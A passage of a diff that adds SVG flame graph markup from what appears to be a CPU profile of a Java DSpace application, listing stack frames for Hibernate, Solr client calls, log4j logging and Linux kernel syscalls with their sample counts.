+<title>__GI___libc_write (1 samples, 0.15%)</title><rect x="917.7" y="389" width="1.7" height="15.0" fill="rgb(242,112,112)" rx="2" ry="2" />
+<text  x="920.69" y="399.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (3 samples, 0.44%)</title><rect x="945.6" y="405" width="5.3" height="15.0" fill="rgb(64,213,64)" rx="2" ry="2" />
+<text  x="948.62" y="415.5" ></text>
+</g>
+<g >
+<title>ctx_sched_in (1 samples, 0.15%)</title><rect x="322.5" y="741" width="1.7" height="15.0" fill="rgb(221,80,80)" rx="2" ry="2" />
+<text  x="325.46" y="751.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="238.7" y="229" width="1.7" height="15.0" fill="rgb(252,126,126)" rx="2" ry="2" />
+<text  x="241.67" y="239.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (4 samples, 0.59%)</title><rect x="566.8" y="437" width="7.0" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="569.83" y="447.5" ></text>
+</g>
+<g >
+<title>vtable stub (1 samples, 0.15%)</title><rect x="1158.6" y="533" width="1.7" height="15.0" fill="rgb(227,89,89)" rx="2" ry="2" />
+<text  x="1161.58" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareCollectionFlushes (1 samples, 0.15%)</title><rect x="1114.9" y="469" width="1.8" height="15.0" fill="rgb(55,205,55)" rx="2" ry="2" />
+<text  x="1117.94" y="479.5" ></text>
+</g>
+<g >
+<title>do_softirq_own_stack (1 samples, 0.15%)</title><rect x="472.6" y="709" width="1.7" height="15.0" fill="rgb(237,105,105)" rx="2" ry="2" />
+<text  x="475.57" y="719.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/tree/DefaultExpressionEngine:::findNodesForKey (1 samples, 0.15%)</title><rect x="1156.8" y="517" width="1.8" height="15.0" fill="rgb(55,204,55)" rx="2" ry="2" />
+<text  x="1159.83" y="527.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (59 samples, 8.73%)</title><rect x="367.8" y="869" width="103.0" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="370.84" y="879.5" >do_syscall_64</text>
+</g>
+<g >
+<title>java/net/SocketTimeoutException:::&lt;init&gt; (1 samples, 0.15%)</title><rect x="1167.3" y="245" width="1.8" height="15.0" fill="rgb(58,208,58)" rx="2" ry="2" />
+<text  x="1170.31" y="255.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (15 samples, 2.22%)</title><rect x="502.2" y="885" width="26.2" height="15.0" fill="rgb(235,101,101)" rx="2" ry="2" />
+<text  x="505.25" y="895.5" >d..</text>
+</g>
+<g >
+<title>org/postgresql/core/v3/QueryExecutorImpl:::processResults (1 samples, 0.15%)</title><rect x="912.5" y="341" width="1.7" height="15.0" fill="rgb(63,212,63)" rx="2" ry="2" />
+<text  x="915.46" y="351.5" ></text>
+</g>
+<g >
+<title>com/sun/proxy/$Proxy40:::isDirty (17 samples, 2.51%)</title><rect x="544.1" y="549" width="29.7" height="15.0" fill="rgb(85,232,85)" rx="2" ry="2" />
+<text  x="547.14" y="559.5" >co..</text>
+</g>
+<g >
+<title>sock_def_readable (2 samples, 0.30%)</title><rect x="512.7" y="485" width="3.5" height="15.0" fill="rgb(211,66,66)" rx="2" ry="2" />
+<text  x="515.72" y="495.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (4 samples, 0.59%)</title><rect x="1169.1" y="325" width="6.9" height="15.0" fill="rgb(212,68,68)" rx="2" ry="2" />
+<text  x="1172.05" y="335.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/AbstractHttpClient:::doExecute (3 samples, 0.44%)</title><rect x="964.8" y="501" width="5.3" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="967.82" y="511.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (5 samples, 0.74%)</title><rect x="874.1" y="469" width="8.7" height="15.0" fill="rgb(80,228,80)" rx="2" ry="2" />
+<text  x="877.05" y="479.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp2/DelegatingPreparedStatement:::executeQuery (1 samples, 0.15%)</title><rect x="912.5" y="373" width="1.7" height="15.0" fill="rgb(79,226,79)" rx="2" ry="2" />
+<text  x="915.46" y="383.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::initializeEntitiesAndCollections (1 samples, 0.15%)</title><rect x="703.0" y="501" width="1.7" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="705.99" y="511.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::tryNaturalIdLoadAccess (1 samples, 0.15%)</title><rect x="1048.6" y="517" width="1.8" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="1051.61" y="527.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (2 samples, 0.30%)</title><rect x="360.9" y="805" width="3.4" height="15.0" fill="rgb(225,87,87)" rx="2" ry="2" />
+<text  x="363.86" y="815.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::put (1 samples, 0.15%)</title><rect x="671.6" y="421" width="1.7" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="674.57" y="431.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/tree/DefaultConfigurationKey$KeyIterator:::nextDelimiterPos (1 samples, 0.15%)</title><rect x="1156.8" y="485" width="1.8" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="1159.83" y="495.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.15%)</title><rect x="287.5" y="901" width="1.8" height="15.0" fill="rgb(248,121,121)" rx="2" ry="2" />
+<text  x="290.54" y="911.5" ></text>
+</g>
+<g >
+<title>native_write_msr (4 samples, 0.59%)</title><rect x="1169.1" y="181" width="6.9" height="15.0" fill="rgb(254,129,129)" rx="2" ry="2" />
+<text  x="1172.05" y="191.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/comparator/NameAscendingComparator:::compare (1 samples, 0.15%)</title><rect x="933.4" y="421" width="1.7" height="15.0" fill="rgb(103,248,103)" rx="2" ry="2" />
+<text  x="936.40" y="431.5" ></text>
+</g>
+<g >
+<title>tcp_sendmsg (11 samples, 1.63%)</title><rect x="509.2" y="821" width="19.2" height="15.0" fill="rgb(213,69,69)" rx="2" ry="2" />
+<text  x="512.23" y="831.5" ></text>
+</g>
+<g >
+<title>hrtimer_interrupt (1 samples, 0.15%)</title><rect x="102.5" y="709" width="1.8" height="15.0" fill="rgb(239,107,107)" rx="2" ry="2" />
+<text  x="105.51" y="719.5" ></text>
+</g>
+<g >
+<title>__sys_recvfrom (16 samples, 2.37%)</title><rect x="470.8" y="853" width="28.0" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="473.83" y="863.5" >_..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (3 samples, 0.44%)</title><rect x="675.1" y="437" width="5.2" height="15.0" fill="rgb(99,245,99)" rx="2" ry="2" />
+<text  x="678.06" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::preProcess (2 samples, 0.30%)</title><rect x="1160.3" y="485" width="3.5" height="15.0" fill="rgb(91,238,91)" rx="2" ry="2" />
+<text  x="1163.33" y="495.5" ></text>
+</g>
+<g >
+<title>nf_hook_slow (3 samples, 0.44%)</title><rect x="516.2" y="565" width="5.2" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="519.21" y="575.5" ></text>
+</g>
+<g >
+<title>do_syscall_64 (1 samples, 0.15%)</title><rect x="327.7" y="789" width="1.7" height="15.0" fill="rgb(243,113,113)" rx="2" ry="2" />
+<text  x="330.69" y="799.5" ></text>
+</g>
+<g >
+<title>sun/reflect/UnsafeObjectFieldAccessorImpl:::get (1 samples, 0.15%)</title><rect x="792.0" y="469" width="1.8" height="15.0" fill="rgb(92,239,92)" rx="2" ry="2" />
+<text  x="795.01" y="479.5" ></text>
+</g>
+<g >
+<title>__x64_sys_poll (1 samples, 0.15%)</title><rect x="968.3" y="293" width="1.8" height="15.0" fill="rgb(241,109,109)" rx="2" ry="2" />
+<text  x="971.31" y="303.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::executeMethod (3 samples, 0.44%)</title><rect x="952.6" y="549" width="5.2" height="15.0" fill="rgb(66,214,66)" rx="2" ry="2" />
+<text  x="955.60" y="559.5" ></text>
+</g>
+<g >
+<title>start_thread (3 samples, 0.44%)</title><rect x="324.2" y="917" width="5.2" height="15.0" fill="rgb(245,116,116)" rx="2" ry="2" />
+<text  x="327.20" y="927.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/CombinedConfiguration:::fetchNodeList (5 samples, 0.74%)</title><rect x="971.8" y="533" width="8.7" height="15.0" fill="rgb(72,220,72)" rx="2" ry="2" />
+<text  x="974.80" y="543.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::execute (3 samples, 0.44%)</title><rect x="952.6" y="485" width="5.2" height="15.0" fill="rgb(73,221,73)" rx="2" ry="2" />
+<text  x="955.60" y="495.5" ></text>
+</g>
+<g >
+<title>start_thread (379 samples, 56.07%)</title><rect x="528.4" y="917" width="661.6" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="531.43" y="927.5" >start_thread</text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentBag:::beforeInitialize (1 samples, 0.15%)</title><rect x="933.4" y="309" width="1.7" height="15.0" fill="rgb(94,240,94)" rx="2" ry="2" />
+<text  x="936.40" y="319.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/dbcp2/DelegatingConnection:::prepareStatement (1 samples, 0.15%)</title><rect x="1050.4" y="453" width="1.7" height="15.0" fill="rgb(65,213,65)" rx="2" ry="2" />
+<text  x="1053.36" y="463.5" ></text>
+</g>
+<g >
+<title>itable stub (4 samples, 0.59%)</title><rect x="708.2" y="469" width="7.0" height="15.0" fill="rgb(240,109,109)" rx="2" ry="2" />
+<text  x="711.22" y="479.5" ></text>
+</g>
+<g >
+<title>pthread_cond_wait@@GLIBC_2.3.2 (13 samples, 1.92%)</title><rect x="243.9" y="901" width="22.7" height="15.0" fill="rgb(241,110,110)" rx="2" ry="2" />
+<text  x="246.91" y="911.5" >p..</text>
+</g>
+<g >
+<title>org/hibernate/persister/entity/AbstractEntityPersister:::selectFragment (1 samples, 0.15%)</title><rect x="1053.8" y="437" width="1.8" height="15.0" fill="rgb(91,238,91)" rx="2" ry="2" />
+<text  x="1056.85" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/CollectionType:::isCollectionType (1 samples, 0.15%)</title><rect x="840.9" y="453" width="1.7" height="15.0" fill="rgb(65,213,65)" rx="2" ry="2" />
+<text  x="843.89" y="463.5" ></text>
+</g>
+<g >
+<title>__ip_queue_xmit (1 samples, 0.15%)</title><rect x="472.6" y="789" width="1.7" height="15.0" fill="rgb(249,121,121)" rx="2" ry="2" />
+<text  x="475.57" y="799.5" ></text>
+</g>
+<g >
+<title>__perf_event_task_sched_in (17 samples, 2.51%)</title><rect x="294.5" y="757" width="29.7" height="15.0" fill="rgb(210,65,65)" rx="2" ry="2" />
+<text  x="297.53" y="767.5" >__..</text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (1 samples, 0.15%)</title><rect x="1146.4" y="453" width="1.7" height="15.0" fill="rgb(102,247,102)" rx="2" ry="2" />
+<text  x="1149.36" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isDirty (1 samples, 0.15%)</title><rect x="1022.4" y="437" width="1.8" height="15.0" fill="rgb(89,236,89)" rx="2" ry="2" />
+<text  x="1025.43" y="447.5" ></text>
+</g>
+<g >
+<title>__wake_up_sync_key (1 samples, 0.15%)</title><rect x="514.5" y="469" width="1.7" height="15.0" fill="rgb(232,97,97)" rx="2" ry="2" />
+<text  x="517.47" y="479.5" ></text>
+</g>
+<g >
+<title>org/dspace/eperson/Group_$$_jvst722_1e:::getHibernateLazyInitializer (1 samples, 0.15%)</title><rect x="1097.5" y="421" width="1.7" height="15.0" fill="rgb(79,227,79)" rx="2" ry="2" />
+<text  x="1100.49" y="431.5" ></text>
+</g>
+<g >
+<title>java/util/HashMap:::put (1 samples, 0.15%)</title><rect x="1039.9" y="421" width="1.7" height="15.0" fill="rgb(56,205,56)" rx="2" ry="2" />
+<text  x="1042.88" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (4 samples, 0.59%)</title><rect x="842.6" y="469" width="7.0" height="15.0" fill="rgb(80,227,80)" rx="2" ry="2" />
+<text  x="845.63" y="479.5" ></text>
+</g>
+<g >
+<title>[unknown] (17 samples, 2.51%)</title><rect x="329.4" y="917" width="29.7" height="15.0" fill="rgb(246,117,117)" rx="2" ry="2" />
+<text  x="332.44" y="927.5" >[u..</text>
+</g>
+<g >
+<title>org/hibernate/type/EntityType:::isEntityType (1 samples, 0.15%)</title><rect x="839.1" y="437" width="1.8" height="15.0" fill="rgb(92,239,92)" rx="2" ry="2" />
+<text  x="842.14" y="447.5" ></text>
+</g>
+<g >
+<title>entry_SYSCALL_64 (1 samples, 0.15%)</title><rect x="327.7" y="805" width="1.7" height="15.0" fill="rgb(206,59,59)" rx="2" ry="2" />
+<text  x="330.69" y="815.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="966.6" y="325" width="1.7" height="15.0" fill="rgb(233,98,98)" rx="2" ry="2" />
+<text  x="969.57" y="335.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::socketRead0 (5 samples, 0.74%)</title><rect x="1167.3" y="389" width="8.7" height="15.0" fill="rgb(108,253,108)" rx="2" ry="2" />
+<text  x="1170.31" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (3 samples, 0.44%)</title><rect x="266.6" y="821" width="5.2" height="15.0" fill="rgb(253,128,128)" rx="2" ry="2" />
+<text  x="269.60" y="831.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (2 samples, 0.30%)</title><rect x="559.9" y="421" width="3.4" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="562.85" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/AbstractFlushingEventListener:::prepareEntityFlushes (1 samples, 0.15%)</title><rect x="701.2" y="453" width="1.8" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="704.24" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="289.3" y="725" width="1.7" height="15.0" fill="rgb(247,119,119)" rx="2" ry="2" />
+<text  x="292.29" y="735.5" ></text>
+</g>
+<g >
+<title>org/apache/solr/client/solrj/impl/HttpSolrServer:::request (7 samples, 1.04%)</title><rect x="957.8" y="533" width="12.3" height="15.0" fill="rgb(80,227,80)" rx="2" ry="2" />
+<text  x="960.84" y="543.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/AppenderAttachableImpl:::appendLoopOnAppenders (1 samples, 0.15%)</title><rect x="950.9" y="421" width="1.7" height="15.0" fill="rgb(101,247,101)" rx="2" ry="2" />
+<text  x="953.86" y="431.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="238.7" y="213" width="1.7" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="241.67" y="223.5" ></text>
+</g>
+<g >
+<title>org/apache/http/cookie/CookieSpecRegistry:::getCookieSpec (1 samples, 0.15%)</title><rect x="1160.3" y="421" width="1.8" height="15.0" fill="rgb(80,227,80)" rx="2" ry="2" />
+<text  x="1163.33" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/persister/collection/AbstractCollectionPersister:::getElementPersister (1 samples, 0.15%)</title><rect x="589.5" y="405" width="1.8" height="15.0" fill="rgb(67,216,67)" rx="2" ry="2" />
+<text  x="592.53" y="415.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupHead:::match (1 samples, 0.15%)</title><rect x="980.5" y="469" width="1.8" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="983.53" y="479.5" ></text>
+</g>
+<g >
+<title>org/hibernate/engine/internal/Cascade:::cascade (5 samples, 0.74%)</title><rect x="1069.6" y="421" width="8.7" height="15.0" fill="rgb(62,211,62)" rx="2" ry="2" />
+<text  x="1072.56" y="431.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isComponentType (1 samples, 0.15%)</title><rect x="882.8" y="485" width="1.7" height="15.0" fill="rgb(61,210,61)" rx="2" ry="2" />
+<text  x="885.78" y="495.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (1 samples, 0.15%)</title><rect x="980.5" y="485" width="1.8" height="15.0" fill="rgb(59,208,59)" rx="2" ry="2" />
+<text  x="983.53" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultSaveOrUpdateEventListener:::onSaveOrUpdate (1 samples, 0.15%)</title><rect x="814.7" y="453" width="1.7" height="15.0" fill="rgb(104,249,104)" rx="2" ry="2" />
+<text  x="817.70" y="463.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultLoadEventListener:::onLoad (2 samples, 0.30%)</title><rect x="912.5" y="517" width="3.4" height="15.0" fill="rgb(83,230,83)" rx="2" ry="2" />
+<text  x="915.46" y="527.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::loadCollection (7 samples, 1.04%)</title><rect x="919.4" y="533" width="12.3" height="15.0" fill="rgb(91,237,91)" rx="2" ry="2" />
+<text  x="922.44" y="543.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/FlushVisitor:::processCollection (2 samples, 0.30%)</title><rect x="835.7" y="437" width="3.4" height="15.0" fill="rgb(100,245,100)" rx="2" ry="2" />
+<text  x="838.65" y="447.5" ></text>
+</g>
+<g >
+<title>org/hibernate/internal/SessionImpl:::fireEvict (1 samples, 0.15%)</title><rect x="528.4" y="501" width="1.8" height="15.0" fill="rgb(101,247,101)" rx="2" ry="2" />
+<text  x="531.43" y="511.5" ></text>
+</g>
+<g >
+<title>org/apache/log4j/Category:::forcedLog (1 samples, 0.15%)</title><rect x="950.9" y="453" width="1.7" height="15.0" fill="rgb(77,225,77)" rx="2" ry="2" />
+<text  x="953.86" y="463.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/configuration/DiscoverySearchFilter:::getIndexFieldName (1 samples, 0.15%)</title><rect x="1176.0" y="581" width="1.8" height="15.0" fill="rgb(84,231,84)" rx="2" ry="2" />
+<text  x="1179.04" y="591.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$Curly:::match (1 samples, 0.15%)</title><rect x="980.5" y="453" width="1.8" height="15.0" fill="rgb(68,216,68)" rx="2" ry="2" />
+<text  x="983.53" y="463.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="389" width="3.5" height="15.0" fill="rgb(252,125,125)" rx="2" ry="2" />
+<text  x="241.67" y="399.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (372 samples, 55.03%)</title><rect x="528.4" y="853" width="649.4" height="15.0" fill="rgb(200,50,50)" rx="2" ry="2" />
+<text  x="531.43" y="863.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>org/apache/http/impl/io/AbstractSessionInputBuffer:::fillBuffer (5 samples, 0.74%)</title><rect x="1167.3" y="437" width="8.7" height="15.0" fill="rgb(71,219,71)" rx="2" ry="2" />
+<text  x="1170.31" y="447.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/client/DefaultRequestDirector:::execute (3 samples, 0.44%)</title><rect x="964.8" y="485" width="5.3" height="15.0" fill="rgb(87,234,87)" rx="2" ry="2" />
+<text  x="967.82" y="495.5" ></text>
+</g>
+<g >
+<title>org/dspace/app/util/DailyFileAppender:::subAppend (1 samples, 0.15%)</title><rect x="917.7" y="485" width="1.7" height="15.0" fill="rgb(62,211,62)" rx="2" ry="2" />
+<text  x="920.69" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/criteria/CriteriaLoader:::&lt;init&gt; (2 samples, 0.30%)</title><rect x="1052.1" y="517" width="3.5" height="15.0" fill="rgb(101,247,101)" rx="2" ry="2" />
+<text  x="1055.10" y="527.5" ></text>
+</g>
+<g >
+<title>org/apache/http/protocol/HttpRequestExecutor:::doSendRequest (2 samples, 0.30%)</title><rect x="954.3" y="469" width="3.5" height="15.0" fill="rgb(80,227,80)" rx="2" ry="2" />
+<text  x="957.35" y="479.5" ></text>
+</g>
+<g >
+<title>java/net/SocketInputStream:::read (5 samples, 0.74%)</title><rect x="1167.3" y="405" width="8.7" height="15.0" fill="rgb(66,214,66)" rx="2" ry="2" />
+<text  x="1170.31" y="415.5" ></text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/AbstractPersistentCollection:::isDirty (1 samples, 0.15%)</title><rect x="655.9" y="453" width="1.7" height="15.0" fill="rgb(80,227,80)" rx="2" ry="2" />
+<text  x="658.86" y="463.5" ></text>
+</g>
+<g >
+<title>__schedule (4 samples, 0.59%)</title><rect x="352.1" y="789" width="7.0" height="15.0" fill="rgb(221,81,81)" rx="2" ry="2" />
+<text  x="355.13" y="799.5" ></text>
+</g>
+<g >
+<title>org/apache/commons/configuration/HierarchicalConfiguration:::containsKey (5 samples, 0.74%)</title><rect x="971.8" y="549" width="8.7" height="15.0" fill="rgb(63,212,63)" rx="2" ry="2" />
+<text  x="974.80" y="559.5" ></text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/DefaultListableBeanFactory:::getBeansOfType (2 samples, 0.30%)</title><rect x="1148.1" y="533" width="3.5" height="15.0" fill="rgb(93,239,93)" rx="2" ry="2" />
+<text  x="1151.11" y="543.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$BmpCharProperty:::match (1 samples, 0.15%)</title><rect x="980.5" y="421" width="1.8" height="15.0" fill="rgb(74,222,74)" rx="2" ry="2" />
+<text  x="983.53" y="431.5" ></text>
+</g>
+<g >
+<title>java/util/Arrays:::sort (1 samples, 0.15%)</title><rect x="933.4" y="469" width="1.7" height="15.0" fill="rgb(66,215,66)" rx="2" ry="2" />
+<text  x="936.40" y="479.5" ></text>
+</g>
+<g >
+<title>__schedule (12 samples, 1.78%)</title><rect x="329.4" y="789" width="21.0" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="332.44" y="799.5" ></text>
+</g>
+<g >
+<title>org/hibernate/loader/Loader:::getRowFromResultSet (1 samples, 0.15%)</title><rect x="936.9" y="453" width="1.7" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="939.89" y="463.5" ></text>
+</g>
+<g >
+<title>finish_task_switch (18 samples, 2.66%)</title><rect x="292.8" y="773" width="31.4" height="15.0" fill="rgb(218,76,76)" rx="2" ry="2" />
+<text  x="295.78" y="783.5" >fi..</text>
+</g>
+<g >
+<title>org/springframework/beans/factory/support/AbstractAutowireCapableBeanFactory:::initializeBean (2 samples, 0.30%)</title><rect x="1148.1" y="485" width="3.5" height="15.0" fill="rgb(66,214,66)" rx="2" ry="2" />
+<text  x="1151.11" y="495.5" ></text>
+</g>
+<g >
+<title>org/hibernate/type/AbstractStandardBasicType:::isDirty (1 samples, 0.15%)</title><rect x="554.6" y="405" width="1.8" height="15.0" fill="rgb(70,218,70)" rx="2" ry="2" />
+<text  x="557.62" y="415.5" ></text>
+</g>
+<g >
+<title>org/apache/http/impl/conn/ManagedClientConnectionImpl:::isStale (5 samples, 0.74%)</title><rect x="1167.3" y="485" width="8.7" height="15.0" fill="rgb(102,248,102)" rx="2" ry="2" />
+<text  x="1170.31" y="495.5" ></text>
+</g>
+<g >
+<title>set_task_cpu (1 samples, 0.15%)</title><rect x="242.2" y="597" width="1.7" height="15.0" fill="rgb(209,64,64)" rx="2" ry="2" />
+<text  x="245.16" y="607.5" ></text>
+</g>
+<g >
+<title>tcp_v4_rcv (2 samples, 0.30%)</title><rect x="512.7" y="533" width="3.5" height="15.0" fill="rgb(234,99,99)" rx="2" ry="2" />
+<text  x="515.72" y="543.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (1 samples, 0.15%)</title><rect x="966.6" y="293" width="1.7" height="15.0" fill="rgb(224,85,85)" rx="2" ry="2" />
+<text  x="969.57" y="303.5" ></text>
+</g>
+<g >
+<title>java/util/regex/Pattern$GroupTail:::match (1 samples, 0.15%)</title><rect x="980.5" y="501" width="1.8" height="15.0" fill="rgb(71,219,71)" rx="2" ry="2" />
+<text  x="983.53" y="511.5" ></text>
+</g>
+<g >
+<title>VM_Periodic_Tas (22 samples, 3.25%)</title><rect x="291.0" y="933" width="38.4" height="15.0" fill="rgb(242,111,111)" rx="2" ry="2" />
+<text  x="294.04" y="943.5" >VM_..</text>
+</g>
+<g >
+<title>org/apache/log4j/helpers/PatternConverter:::format (1 samples, 0.15%)</title><rect x="949.1" y="325" width="1.8" height="15.0" fill="rgb(89,236,89)" rx="2" ry="2" />
+<text  x="952.11" y="335.5" ></text>
+</g>
+<g >
+<title>native_write_msr (16 samples, 2.37%)</title><rect x="294.5" y="725" width="28.0" height="15.0" fill="rgb(221,80,80)" rx="2" ry="2" />
+<text  x="297.53" y="735.5" >n..</text>
+</g>
+<g >
+<title>ext4_file_write_iter (1 samples, 0.15%)</title><rect x="945.6" y="165" width="1.8" height="15.0" fill="rgb(223,84,84)" rx="2" ry="2" />
+<text  x="948.62" y="175.5" ></text>
+</g>
+<g >
+<title>org/hibernate/event/internal/DefaultFlushEntityEventListener:::dirtyCheck (2 samples, 0.30%)</title><rect x="870.6" y="469" width="3.5" height="15.0" fill="rgb(97,243,97)" rx="2" ry="2" />
+<text  x="873.56" y="479.5" ></text>
+</g>
+<g >
+<title>itable stub (1 samples, 0.15%)</title><rect x="732.7" y="453" width="1.7" height="15.0" fill="rgb(208,61,61)" rx="2" ry="2" />
+<text  x="735.66" y="463.5" ></text>
+</g>
+<g >
+<title>pthread_cond_timedwait@@GLIBC_2.3.2 (20 samples, 2.96%)</title><rect x="10.0" y="901" width="34.9" height="15.0" fill="rgb(222,82,82)" rx="2" ry="2" />
+<text  x="13.00" y="911.5" >pt..</text>
+</g>
+<g >
+<title>org/dspace/content/Item_$$_jvst722_4:::getHandle (2 samples, 0.30%)</title><rect x="912.5" y="581" width="3.4" height="15.0" fill="rgb(88,235,88)" rx="2" ry="2" />
+<text  x="915.46" y="591.5" ></text>
+</g>
+<g >
+<title>usb_giveback_urb_bh (1 samples, 0.15%)</title><rect x="1113.2" y="357" width="1.7" height="15.0" fill="rgb(229,93,93)" rx="2" ry="2" />
+<text  x="1116.20" y="367.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (78 samples, 11.54%)</title><rect x="107.8" y="821" width="136.1" height="15.0" fill="rgb(237,104,104)" rx="2" ry="2" />
+<text  x="110.75" y="831.5" >[libjvm.so]</text>
+</g>
+<g >
+<title>java/util/ArrayList:::iterator (1 samples, 0.15%)</title><rect x="668.1" y="437" width="1.7" height="15.0" fill="rgb(93,240,93)" rx="2" ry="2" />
+<text  x="671.08" y="447.5" ></text>
+</g>
+<g >
+<title>org/dspace/discovery/SolrServiceImpl:::unIndexContent (7 samples, 1.04%)</title><rect x="1163.8" y="581" width="12.2" height="15.0" fill="rgb(60,209,60)" rx="2" ry="2" />
+<text  x="1166.82" y="591.5" ></text>
+</g>
+<g >
+<title>__x64_sys_futex (12 samples, 1.78%)</title><rect x="329.4" y="853" width="21.0" height="15.0" fill="rgb(202,52,52)" rx="2" ry="2" />
+<text  x="332.44" y="863.5" ></text>
+</g>
+<g >
+<title>[unknown] (61 samples, 9.02%)</title><rect x="364.3" y="917" width="106.5" height="15.0" fill="rgb(205,58,58)" rx="2" ry="2" />
+<text  x="367.35" y="927.5" >[unknown]</text>
+</g>
+<g >
+<title>org/hibernate/collection/internal/PersistentSet:::toArray (1 samples, 0.15%)</title><rect x="935.1" y="469" width="1.8" height="15.0" fill="rgb(101,247,101)" rx="2" ry="2" />
+<text  x="938.15" y="479.5" ></text>
+</g>
+<g >
+<title>org/dspace/content/comparator/NameAscendingComparator:::compare (1 samples, 0.15%)</title><rect x="933.4" y="437" width="1.7" height="15.0" fill="rgb(98,244,98)" rx="2" ry="2" />
+<text  x="936.40" y="447.5" ></text>
+</g>
+<g >
+<title>[libjvm.so] (2 samples, 0.30%)</title><rect x="238.7" y="373" width="3.5" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="241.67" y="383.5" ></text>
+</g>
+<g >
+<title>itable stub (4 samples, 0.59%)</title><rect x="1081.8" y="453" width="7.0" height="15.0" fill="rgb(216,73,73)" rx="2" ry="2" />
+<text  x="1084.78" y="463.5" ></text>
+</g>
+<g >
+<title>nf_ct_deliver_cached_events (1 samples, 0.15%)</title><rect x="521.4" y="677" width="1.8" height="15.0" fill="rgb(202,53,53)" rx="2" ry="2" />
+<text  x="524.45" y="687.5" ></text>
+</g>
+<g >
